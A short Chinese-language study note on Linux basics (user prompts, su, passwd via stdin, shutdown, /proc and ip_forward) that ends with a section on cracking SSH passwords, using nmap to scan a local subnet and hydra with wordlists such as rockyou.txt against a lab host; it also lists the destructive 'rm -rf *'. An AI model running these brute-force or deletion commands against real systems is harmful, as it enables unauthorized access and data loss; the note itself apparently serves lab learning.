note

Linux指令格式

符號 意義
$ 一般使用者
# 超級使用者
~ 代表home directory

指令 [參數] [選項],中誇號帶表可以有也可以沒有

變成超級使用者可以切換成各種使用者

su - usersu - tom

echo "12345678" | passwd --stdin tom: 修改tom 的密碼

ctrl+Alt+f1,可以進入虛擬終端機,可以使用f1~f6

shutdown -h +10: 十分鐘後關機、shutdown -r +10: 十分鐘後重新開機

rm -rf *: 所有檔案資料刪除(remove recursive force)

Linux檔案

指令修改硬體檔案

cd /proc

cat cpuinfo  ## 查看CPU資訊


cd /proc/sys/net/ipv4
cat /ip_forward  ## 可以查看有沒有路由功能(1是有,0沒有)
## 所以可以使用下面指令達到開啟和關閉熱點
echo 1 > /proc/sys/net/ipv4/ip_forward  ## 開啟
echo 0 > /proc/sys/net/ipv4/ip_forward  ## 關閉

使用遠端破解密碼

SSH: https://null-byte.wonderhowto.com/how-to/gain-ssh-access-servers-by-brute-forcing-credentials-0194263/

可以使用單人模式進行破解

但我們這裡使用nmaphydra進行破解

nmap: 可以獲得虛擬機的資訊

hydra: 可以對帳號密碼使用暴力破解,不過需要提供字典,可以上網使用rockyou.txt

sudo apt-get install nmap  ## 安裝套件,centos 使用 yum install nmap

nmap -A 192.168.157.0/24  ## 對目前的區域網路進行掃瞄,會拿到有連線到目前區域的IP(192.168.157.128)

ssh user1@192.168.157.128  ## 需要使用者帳密
sudo apt install hydra  ## 安裝套件

hydra -l user.txt -P passwords.txt -t 4 192.168.157.128 ssh  ## -t代表開4個線程,比較快

上面hydra可以遠端破解,可以把user.txt檔案裏面的user使用password.txt暴力破解

Linux指令